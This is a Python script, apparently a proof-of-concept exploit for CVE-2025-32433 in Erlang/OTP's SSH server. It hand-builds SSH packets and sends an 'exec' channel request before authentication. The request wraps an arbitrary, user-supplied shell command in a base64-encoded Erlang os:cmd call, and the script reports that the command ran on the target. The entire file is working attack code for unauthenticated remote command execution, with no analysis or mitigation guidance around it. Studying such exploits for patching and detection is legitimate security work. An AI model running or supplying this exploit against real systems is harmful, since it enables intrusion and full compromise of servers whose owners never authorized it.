| import argparse |
| import base64 |
| import socket |
| import struct |
| import time |
|
|
|
|
| |
| def string_payload(s): |
| s_bytes = s.encode("utf-8") |
| return struct.pack(">I", len(s_bytes)) + s_bytes |
|
|
|
|
| |
| def build_channel_open(channel_id=0): |
| return ( |
| b"\x5a" |
| + string_payload("session") |
| + struct.pack(">I", channel_id) |
| + struct.pack(">I", 0x68000) |
| + struct.pack(">I", 0x10000) |
| ) |
|
|
|
|
| |
| def build_channel_request(channel_id=0, command=None): |
| return ( |
| b"\x62" |
| + struct.pack(">I", channel_id) |
| + string_payload("exec") |
| + b"\x01" |
| + string_payload(command) |
| ) |
|
|
|
|
| |
| def build_kexinit(): |
| cookie = b"\x00" * 16 |
|
|
| def name_list(_name): |
| return string_payload(",".join(_name)) |
|
|
| |
| return ( |
| b"\x14" |
| + cookie |
| + name_list( |
| [ |
| "curve25519-sha256", |
| "ecdh-sha2-nistp256", |
| "diffie-hellman-group-exchange-sha256", |
| "diffie-hellman-group14-sha256", |
| ] |
| ) |
| + name_list(["rsa-sha2-256", "rsa-sha2-512"]) |
| + name_list(["aes128-ctr"]) * 2 |
| + name_list(["hmac-sha1"]) * 2 |
| + name_list(["none"]) * 2 |
| + name_list([]) * 2 |
| + b"\x00" |
| + struct.pack(">I", 0) |
| ) |
|
|
|
|
| |
| def pad_packet(payload, block_size=8): |
| min_padding = 4 |
| padding_len = block_size - ((len(payload) + 5) % block_size) |
| if padding_len < min_padding: |
| padding_len += block_size |
| return struct.pack(">I", len(payload) + 1 + padding_len) + bytes([padding_len]) + payload + bytes([0] * padding_len) |
|
|
|
|
| |
| def format_erlang_command(cmd): |
| |
| encoded_cmd = base64.b64encode(cmd.encode()).decode() |
| |
| return f'os:cmd(binary_to_list(base64:decode("{encoded_cmd}"))).' |
|
|
|
|
| |
| def main(): |
| |
| parser = argparse.ArgumentParser(description="Exploit for Erlang CVE-2025-32433") |
| parser.add_argument("-t", "--target", default="127.0.0.1", help="Target IP address (default: 127.0.0.1)") |
| parser.add_argument("-p", "--port", type=int, default=2222, help="Target port (default: 2222)") |
| parser.add_argument("-c", "--command", help="System command to execute (for example: touch /tmp/success)") |
| args = parser.parse_args() |
|
|
| |
| erlang_cmd = format_erlang_command(args.command) |
|
|
| try: |
| with socket.create_connection((args.target, args.port), timeout=5) as s: |
| print("[*] Connecting to SSH server...") |
| DELAYSSS = 0.5 |
|
|
| |
| s.sendall(b"SSH-2.0-OpenSSH_8.9\r\n") |
| banner = s.recv(1024) |
| print(f"[+] Received banner: {banner.strip().decode(errors='ignore')}") |
| time.sleep(DELAYSSS) |
|
|
| |
| print("[*] Sending SSH_MSG_KEXINIT...") |
| kex_packet = build_kexinit() |
| s.sendall(pad_packet(kex_packet)) |
| time.sleep(DELAYSSS) |
|
|
| |
| print("[*] Sending SSH_MSG_CHANNEL_OPEN...") |
| chan_open = build_channel_open() |
| s.sendall(pad_packet(chan_open)) |
| time.sleep(DELAYSSS) |
|
|
| |
| print("[*] Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)...") |
| print(f"[*] Erlang payload: {erlang_cmd}") |
| chan_req = build_channel_request(command=erlang_cmd) |
| s.sendall(pad_packet(chan_req)) |
|
|
| print("[✓] Exploit sent! Command executed on target") |
|
|
| |
| try: |
| response = s.recv(1024) |
| print(f"[+] Received response: {response.hex()}") |
| except TimeoutError: |
| print("[*] No response within timeout period (which is expected)") |
|
|
| except Exception as e: |
| print(f"[!] Error: {e}") |
|
|
|
|
| if __name__ == "__main__": |
| main() |
|
|